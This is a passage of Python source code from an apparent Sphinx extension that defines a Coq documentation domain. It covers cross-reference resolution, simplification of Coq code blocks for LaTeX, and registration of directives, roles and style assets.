            our_objects = self.data['objects'][subdomain]
            for name, (docname, objtype, targetid) in their_objects.items():
                if docname in docnames:
                    if name in our_objects:
                        self.env.warn(docname, DUP.format(name, our_objects[name][0]))
                    our_objects[name] = (docname, objtype, targetid)

    def resolve_xref(self, env, fromdocname, builder, role, targetname, node, contnode):
        # ‘target’ is the name that was written in the document
        # ‘role’ is where this xref comes from; it's exactly one of our subdomains
        if role == 'index':
            index = CoqDomain.find_index_by_name(targetname)
            if index:
                return make_refnode(builder, fromdocname, "coq-" + index.name, '', contnode, index.localname)
        else:
            resolved = self.data['objects'][role].get(targetname)
            if resolved:
                (todocname, _, targetid) = resolved
                return make_refnode(builder, fromdocname, todocname, targetid, contnode, targetname)
        return None

    def clear_doc(self, docname_to_clear):
        # Drop every object registered by a document about to be re-read.
        for subdomain_objects in self.data['objects'].values():
            for name, (docname, _, _) in list(subdomain_objects.items()):
                if docname == docname_to_clear:
                    del subdomain_objects[name]
def is_coqtop_or_coqdoc_block(node):
    """Return True iff ``node`` is a docutils Element carrying a ``coqtop``
    or ``coqdoc`` CSS class."""
    if not isinstance(node, nodes.Element):
        return False
    classes = node['classes']
    return 'coqtop' in classes or 'coqdoc' in classes
def simplify_source_code_blocks_for_latex(app, doctree, fromdocname): # pylint: disable=unused-argument
    """Simplify coqdoc and coqtop blocks.

    In HTML mode, this does nothing; in other formats, such as LaTeX, it
    replaces coqdoc and coqtop blocks by plain text sources, which will use
    pygments if available. This prevents the LaTeX builder from getting
    confused.
    """
    is_html = app.builder.tags.has("html")
    for node in doctree.traverse(is_coqtop_or_coqdoc_block):
        if is_html:
            node.rawsource = ''  # Prevent pygments from kicking in
            continue
        if 'coqtop-hidden' in node['classes']:
            # Hidden coqtop fragments have no printable form; drop them entirely.
            node.parent.remove(node)
        else:
            node.replace_self(nodes.literal_block(node.rawsource, node.rawsource, language="Coq"))
# Directives registered globally (outside the Coq domain) by ``setup``.
COQ_ADDITIONAL_DIRECTIVES = [CoqtopDirective,
                             CoqdocDirective,
                             ExampleDirective,
                             InferenceDirective,
                             PreambleDirective]

# Roles registered globally (outside the Coq domain) by ``setup``.
COQ_ADDITIONAL_ROLES = [GrammarProductionRole,
                        GlossaryDefRole]
def setup(app):
    """Register the Coq domain, its directives/roles, transforms, and assets.

    Entry point called by Sphinx when the extension is loaded.  Returns the
    extension metadata dict Sphinx expects.
    """
    # Sanity checks: every subdomain referenced by an index must come from a
    # directive, and every directive subdomain must have a matching role.
    subdomains = {obj.subdomain for obj in CoqDomain.directives.values()}
    found = set(chain.from_iterable(idx.subdomains for idx in CoqDomain.indices))
    assert subdomains.issuperset(found), "Missing subdomains: {}".format(found.difference(subdomains))
    assert subdomains.issubset(CoqDomain.roles.keys()), \
        "Missing from CoqDomain.roles: {}".format(subdomains.difference(CoqDomain.roles.keys()))

    # Add domain, directives, and roles
    app.add_domain(CoqDomain)
    app.add_index_to_domain('std', StdGlossaryIndex)
    for role in COQ_ADDITIONAL_ROLES:
        app.add_role(role.role_name, role)
    for directive in COQ_ADDITIONAL_DIRECTIVES:
        app.add_directive(directive.directive_name, directive)
    app.add_transform(CoqtopBlocksTransform)
    # Handler order matters: blocks are simplified before consecutive coqtop
    # blocks are merged.
    app.connect('doctree-resolved', simplify_source_code_blocks_for_latex)
    app.connect('doctree-resolved', CoqtopBlocksTransform.merge_consecutive_coqtop_blocks)

    # Add extra styles
    app.add_css_file("ansi.css")
    app.add_css_file("coqdoc.css")
    app.add_js_file("notations.js")
    app.add_css_file("notations.css")
    app.add_css_file("pre-text.css")

    # Tell Sphinx about extra settings
    app.add_config_value("report_undocumented_coq_objects", None, 'env')

    # ``env_version`` is used by Sphinx to know when to invalidate
    # coqdomain-specific bits in its caches. It should be incremented when the
    # contents of ``env.domaindata['coq']`` change. See
    # `https://github.com/sphinx-doc/sphinx/issues/4460`.
    return {"version": "0.1",
            "env_version": 2,
            "parallel_read_safe": True}
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.